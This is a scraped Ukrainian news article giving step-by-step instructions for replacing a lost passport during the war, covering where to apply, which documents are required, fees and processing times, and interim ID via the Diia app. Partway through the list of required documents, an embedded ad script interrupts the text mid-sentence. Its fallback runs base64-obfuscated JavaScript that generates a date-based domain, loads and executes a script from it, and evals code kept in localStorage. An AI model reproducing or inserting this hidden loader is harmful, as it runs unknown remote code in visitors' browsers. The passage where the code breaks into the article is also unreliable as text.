Як відновити втрачений паспорт під час війни: покрокова інструкція

Багато людей, що виїхали з окупованих територій опинилися в ситуації, коли були втрачені важливі документи, паспорт — один із них. Відновити паспорт знаходячись на ТОТ неможливо, в такому випадку можна лише користуватися Дією. Але для тих, хто виїхав, є чіткий алгоритм дій.

На сьогодні документом, що підтверджує громадянство та визначає приналежність особи до держави, є паспорт. В Україні такими документами є внутрішній паспорт громадянина України – ID-картка або книжечка зразка 1994 року, а також закордонний паспорт.

Куди звернутися для відновлення втраченого паспорта?

Оформити новий документ можна у підрозділ ДМС України чи у Центрі надання адміністративних послуг (ЦНАП).

Дізнатись в яких областях працюють ЦНАПи, а також їх адреси у тому місті, де ви знаходитесь, можна за посиланням https://center.diia.gov.ua/perelik-centriv-so-nadaut-pasportni-poslugi-3.

Перевірити, чи працюють підрозділи ДМС у вашому регіоні та знайти контактний номер можна за посиланням: https://cutt.ly/9STmI7r.

Основні документи, які необхідно подати для оформлення паспорта громадянина України замість втраченого або викраденого: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

 заява про втрату паспорта; витяг з Єдиного реєстру досудових розслідувань (у разі викрадення паспорта); документ, що підтверджує сплату адміністративного збору, або оригінал документа про звільнення від його сплати; довідка органу реєстрації встановленого зразка про місце проживання (за наявності).

Крім того, для відновлення паспорта можуть знадобитися додаткові документи (також за наявності):

 довідка про присвоєння реєстраційного номера облікової картки платника податків або повідомлення про відмову від його прийняття (для осіб, які через свої релігійні переконання відмовилися від прийняття зазначеного номера); якщо є неповнолітні діти – свідоцтва про їх народження; свідоцтво про шлюб або про розірвання шлюбу (за наявності); довідка про взяття на облік ВПО — для ВПО; для особи, яка не може пересуватися самостійно у зв’язку з тривалим розладом здоров’я – одна фотокартка розміром 10 х 15 см для внесення відцифрованого образу обличчя шляхом сканування із застосуванням засобів Реєстру; для бездомних осіб – посвідчення про взяття на облік бездомних осіб; для осіб, яких не було встановлено за результатами проведення процедури встановлення особи – рішення суду про встановлення особи.

З повним переліком документів, які можуть знадобитися для оформлення паспорта громадянина України, радимо ознайомитися на офіційному веб-сайті ДМС України https://dmsu.gov.ua/poslugi/pasport-gromadyanina-ukrajni/id-oformlennya-pasporta-gromadyanina-ukrajni-u-formi-kartki-u-razi-obminu-pasporta-zamist-vtrachenogo-abo-vikradenogo.html.

Строки й вартість

У звичайному режимі відновлення внутрішнього паспорта громадянина України триває з дня оформлення нового документа та складає до 20 робочих днів, при цьому його вартість становить 372 грн., до 10 робочих днів — 498 грн.

Як посвідчити особу, поки оформляється паспорт громадянина України?

В Україні для посвідчення особи можна використовувати наступні документи:

закордонний паспорт;водійське посвідчення;цифрові документи в мобільному застосунку «Дія», адже вони мають таку ж юридичну силу, як їх паперовий чи пластиковий аналог. Цифровий паспорт можна пред’являти на блокпостах та поліції, і навіть використовувати для перетину кордону у Польщі та Молдові.

 «єДокумент» в «Дії» – це тимчасовий документ для посвідчення особи у період воєнного стану, він створюється автоматично на підставі даних із BankID або даних біометричного документа, треба лише оновити застосунок. (adsbygoogle = window.adsbygoogle || []).push({});

«З 16 січня відновлюємо роботу»: як отримати грошову допомогу в Запоріжжі через БФ Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/yak-vidnoviti-vtrachenij-pasport-pid-chas-vijni-pokrokova-instruktsiya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top